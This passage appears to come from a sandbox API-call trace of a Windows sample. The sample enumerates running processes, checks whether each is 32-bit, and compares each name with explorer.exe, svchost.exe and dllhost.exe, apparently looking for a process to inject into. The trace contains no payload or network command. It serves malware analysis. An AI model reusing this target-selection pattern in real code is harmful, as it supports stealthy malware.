(hObject=0xec) returned 1 [0241.744] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0241.744] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0241.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0241.745] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0241.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0241.745] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.745] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.746] CloseHandle (hObject=0xec) returned 1 [0241.746] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0241.746] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0241.746] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0241.746] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0241.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0241.758] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.758] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.758] CloseHandle (hObject=0xec) returned 1 [0241.758] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0241.758] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0241.758] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0241.758] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0241.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0241.758] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.758] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.758] CloseHandle (hObject=0xec) returned 1 [0241.758] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0241.758] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0241.758] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0241.758] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0241.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0241.759] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.759] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.759] CloseHandle (hObject=0xec) returned 1 [0241.759] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0241.759] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0241.759] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0241.759] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0241.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0241.760] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.760] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.760] CloseHandle (hObject=0xec) returned 1 [0241.760] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0241.760] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0241.760] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0241.760] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0241.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0241.760] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.760] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.760] CloseHandle (hObject=0xec) returned 1 [0241.760] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0241.761] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0241.761] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0241.761] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0241.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0241.761] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.761] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.761] CloseHandle (hObject=0xec) returned 1 [0241.761] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0241.761] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0241.761] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0241.761] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0241.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0241.762] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.762] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.763] CloseHandle (hObject=0xec) returned 1 [0241.763] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0241.763] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0241.763] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0241.763] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0241.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0241.763] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.763] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.763] CloseHandle (hObject=0xec) returned 1 [0241.763] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0241.763] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0241.763] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0241.763] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0241.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0241.764] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.764] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.764] CloseHandle (hObject=0xec) returned 1 [0241.764] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0241.764] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0241.764] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0241.764] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0241.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0241.765] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.765] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.765] CloseHandle (hObject=0xec) returned 1 [0241.765] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0241.765] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0241.765] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0241.765] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0241.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0241.765] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.765] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.765] CloseHandle (hObject=0xec) returned 1 [0241.765] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0241.765] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0241.765] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0241.765] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0241.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0241.766] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.766] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.766] CloseHandle (hObject=0xec) returned 1 [0241.766] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0241.766] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0241.766] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0241.766] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0241.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0241.767] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.767] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.767] CloseHandle (hObject=0xec) returned 1 [0241.767] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0241.767] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0241.767] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0241.767] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0241.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0241.767] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.767] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.767] CloseHandle (hObject=0xec) returned 1 [0241.767] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0241.767] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0241.768] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0241.768] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0241.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0241.768] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.768] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.768] CloseHandle (hObject=0xec) returned 1 [0241.768] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0241.768] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0241.768] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0241.768] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0241.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0241.769] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.769] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.769] CloseHandle (hObject=0xec) returned 1 [0241.769] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0241.769] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0241.769] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0241.769] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0241.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0241.769] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.769] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.769] CloseHandle (hObject=0xec) returned 1 [0241.770] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0241.770] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0241.770] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0241.770] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0241.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0241.770] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.770] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.770] CloseHandle (hObject=0xec) returned 1 [0241.770] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0241.770] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0241.770] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0241.770] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0241.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0241.771] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.771] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.771] CloseHandle (hObject=0xec) returned 1 [0241.771] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0241.771] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0241.771] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0241.771] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0241.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0241.771] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.771] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.772] CloseHandle (hObject=0xec) returned 1 [0241.772] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0241.772] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0241.772] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0241.772] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0241.772] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0241.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0241.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0241.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0241.774] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0241.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0241.774] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0241.775] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.775] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.775] CloseHandle (hObject=0xec) returned 1 [0241.775] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0241.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0241.775] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.775] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.775] CloseHandle (hObject=0xec) returned 1 [0241.775] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0241.776] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0241.776] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.776] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.776] CloseHandle (hObject=0xec) returned 1 [0241.776] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0241.776] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0241.777] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.777] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.777] CloseHandle (hObject=0xec) returned 1 [0241.777] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.803] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0241.804] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.804] IsWow64Process (in: hProcess=0xec, 